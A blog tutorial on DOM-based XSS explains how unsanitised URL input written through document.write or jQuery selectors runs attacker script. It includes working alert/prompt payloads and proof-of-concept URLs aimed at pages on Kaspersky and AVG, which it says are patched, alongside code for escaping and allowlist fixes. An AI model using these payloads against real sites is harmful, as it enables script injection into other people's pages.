
[Tutorial] DOM Based XSS Vulnerability | Juno_okyo's Blog
Asalam Alykum Friends.
Title: DOM Based XSS
Author: Darksnipper.

What is DOM?

DOM stands for Document Object Model. It allows client-side scripts (e.g. JavaScript) to dynamically access and modify the content, structure, and style of a webpage.
Like server-side scripts, client-side scripts can also accept and manipulate user input with the help of the DOM.


Example:

Code:
<html>
<head>
</head>
<body>
<script>
var pos=document.URL.indexOf("madleetop=")+10;   //finds the position of the value ("madleetop=" is 10 characters long, so +10 skips the name and the "=")
var userInput=document.URL.substring(pos,document.URL.length);  //copies the value into the userInput variable
document.write(unescape(userInput));  //writes the content to the webpage (this is the vulnerable sink)
</script>
</body>
</html>

I used spaces because the site is filtering my content and removing HTML tags.


In the above example, the JavaScript code gets the value from the URL parameter "madleetop" and writes that value into our webpage.

For example, if the URL is
Code:
www.madleets.com/snipper?madleetop=me
the webpage will display "me".

Did you notice? That part of the webpage is not written by a server-side script. The client-side script modifies the content dynamically based on the input. Everything is done with the help of the DOM object 'document'.
Hope you understand.
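As an added example (not code from the tutorial), here is the madleetop parsing from above next to a safer version, in JavaScript that runs both in a browser and in Node. The parameter name comes from the tutorial; the sample URLs are constructed, and renderInto() assumes only that it is handed an element-like object with a textContent property.

```javascript
// Added example (not part of the original tutorial): the vulnerable
// "document.URL" parsing from the madleetop example next to a safer
// version. The DOM-writing step is isolated in renderInto() so the
// parsing logic can be checked without a browser.

const PARAM = "madleetop"; // parameter name from the tutorial

// The tutorial's approach: find the parameter by string offset and take
// everything after it. Nothing is decoded, validated or escaped, and
// anything after "&" or "#" is swallowed into the value too.
function unsafeExtract(url) {
  const pos = url.indexOf(PARAM + "=");
  if (pos === -1) return "";
  return url.substring(pos + PARAM.length + 1); // +1 skips the "="
}

// Safer: let the URL parser isolate and percent-decode the one parameter.
function safeExtract(url) {
  return new URL(url).searchParams.get(PARAM) ?? "";
}

// Encode the five characters HTML cares about, so the value can only be
// displayed, never parsed as markup. Needed whenever the output is a
// string that will be inserted as HTML (innerHTML, document.write).
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Preferred DOM sink: textContent never interprets the value as HTML,
// so no escaping is required at all.
function renderInto(element, value) {
  element.textContent = value;
  return element.textContent;
}

// Constructed sample URLs (hostname taken from the tutorial).
const BENIGN = "http://www.madleets.com/snipper?madleetop=me";
const HOSTILE = 'http://www.madleets.com/snipper?madleetop=<script>alert("x")</script>';

if (typeof document !== "undefined") {
  // In a browser: render the current page's parameter as plain text.
  const out = document.createElement("pre");
  renderInto(out, safeExtract(document.URL));
  document.body.appendChild(out);
} else {
  console.log(unsafeExtract(HOSTILE));            // raw markup reaches the sink
  console.log(escapeHtml(safeExtract(HOSTILE)));  // shown as text instead
}
```

The two fixes are independent: safeExtract() stops the value from being mis-parsed, and escapeHtml() or textContent stops whatever value is extracted from being treated as markup. The second one is the one that actually removes the XSS; the first just makes the parsing correct.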

DOM Based XSS vulnerability:
When a web developer writes content using the DOM object without sanitizing the user input, it allows an attacker to run his own code.
In the above example, we failed to sanitize the input and simply displayed whatever value we got from the URL.
An attacker with malicious intentions can inject an XSS vector instead.
For example:
Code:
www.madleets.com/snipper?madleetop=<script>alert("Juno_okyo")</script>

The document.write function simply writes the value of the madleetop parameter into the webpage. So it writes '<script>alert("immad")</script>' into the webpage without sanitizing it (the unescape call even decodes any percent-encoding the browser applied to the URL, so the tags arrive intact). This results in the script running and displaying the alert box.

More Information
Other sites can be vulnerable in the same way, for example:
http://www.site.com/me.aspx
A user could inject code such as:

<img src=f00bar onerror=prompt("xss");>

...into the text input in the form and then click the "Search" button.

Example no 2
Kaspersky was also vulnerable to it.
Let me explain how the attacker did it:
The problem was located in bad validation of location.hash passed to jQuery (which was also outdated).
Code:
/*load current tab by url*/

//if($.url.param("tab"))
$('a[name='+$.url.param("tab")+']').trigger('click');

var hash = location.hash;
if (hash.indexOf("tab=") != -1) {
    hash = hash.replace(/^#tab=/, "");
    // the raw fragment is concatenated into the selector string unescaped
    $('a[name=' + hash + ']').trigger('click');
}

If the "tab" value in the URL fragment contains HTML, it is concatenated into the jQuery selector unescaped; older jQuery versions treat a string containing tags as HTML to create rather than as a selector, so the injected element is built and its event handler runs.
Proof of concept:
Code:
http://www.kaspersky.com/tablet-security#tab=<img src=x onerror=prompt("XSS - Juno_okyo");>

Note: it has been patched.
I used it just to make it easy to explain.

Example no 3.
AVG was also vulnerable to it, but they patched it.

PoC:
Due to the lack of escaping/encoding of the URL in the code present in the file js_stdfull.js, a user could inject code into the website.

Vulnerable code:
//display the correct tab based on the url (#name)
var pathname = $(location).attr('href');
var urlparts = pathname.split("#"); // the fragment (urlparts[1]) is then used without escaping/encoding

Proof of concept:
Code:
http://www.avg.com/eu-en/download#"><img src=x onerror=prompt(/XSS/);
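The Kaspersky and AVG cases above have the same shape: a tab name is pulled out of the URL fragment and concatenated into a jQuery selector. This added example (not the vendors' code) shows the defensive version in JavaScript: the name is validated against an allowlist before it is used, and the element is looked up by its name attribute instead of by building a selector string. The doc parameter, the 64-character limit and the helper names are my assumptions.

```javascript
// Added example (not from the Kaspersky or AVG code): validate a tab name
// taken from the URL fragment before it reaches any DOM sink. Handles
// both shapes seen above: "#tab=name" and a bare "#name" after split("#").

// Only identifier-like tab names are accepted (assumed limit: 64 chars).
// A value such as '<img src=x onerror=...>' fails this test and is
// dropped, so it is never handed to $() where older jQuery would parse
// it as HTML.
const TAB_NAME = /^[A-Za-z0-9_-]{1,64}$/;

// Returns the validated tab name, or null if the fragment is absent or
// does not contain a safe name. Browsers percent-encode location.hash,
// so the value is decoded before validation.
function tabFromFragment(hash) {
  if (typeof hash !== "string" || !hash.startsWith("#")) return null;
  let name = hash.slice(1);
  if (name.startsWith("tab=")) name = name.slice(4); // Kaspersky-style "#tab=name"
  try {
    name = decodeURIComponent(name);
  } catch (e) {
    return null; // malformed percent-encoding is rejected, not guessed at
  }
  return TAB_NAME.test(name) ? name : null;
}

// Wrapper for a full URL, the shape AVG's code started from.
function tabFromUrl(href) {
  try {
    return tabFromFragment(new URL(href).hash);
  } catch (e) {
    return null;
  }
}

// Activate the tab without string-building a selector: look the element
// up by its name attribute and, if found, dispatch the click.
// `doc` is injected so the function can be exercised without a browser.
function activateTab(doc, href) {
  const name = tabFromUrl(href);
  if (name === null) return false;
  const links = doc.getElementsByName(name);
  if (links.length === 0) return false;
  links[0].click();
  return true;
}

if (typeof document !== "undefined") {
  activateTab(document, document.location.href);
} else {
  // Constructed sample URLs (hostnames taken from the tutorial).
  console.log(tabFromUrl("http://www.kaspersky.com/tablet-security#tab=features"));
  console.log(tabFromUrl("http://www.avg.com/eu-en/download#windows"));
}
```

Rejecting rather than escaping is the right choice here: a tab name has a small known alphabet, so anything outside it is not a legitimate request, and the page can simply fall back to its default tab.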

Thanks.
Leader at J2TEAM. Website: https://j2team.dev/
